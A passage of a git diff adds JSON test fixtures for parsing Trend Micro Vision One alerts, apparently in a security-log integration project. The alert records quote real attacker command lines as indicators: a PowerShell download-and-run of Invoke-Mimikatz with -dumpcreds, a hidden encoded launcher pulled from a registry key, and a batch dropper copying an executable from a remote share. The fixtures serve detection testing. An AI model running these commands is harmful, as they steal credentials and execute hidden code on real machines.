\\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Credential Dumping via Mimikatz", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "id": "shockwave\\sam", + "name": "sam" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json new file mode 100644 index 000000000..a95ac7fc8 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json @@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": 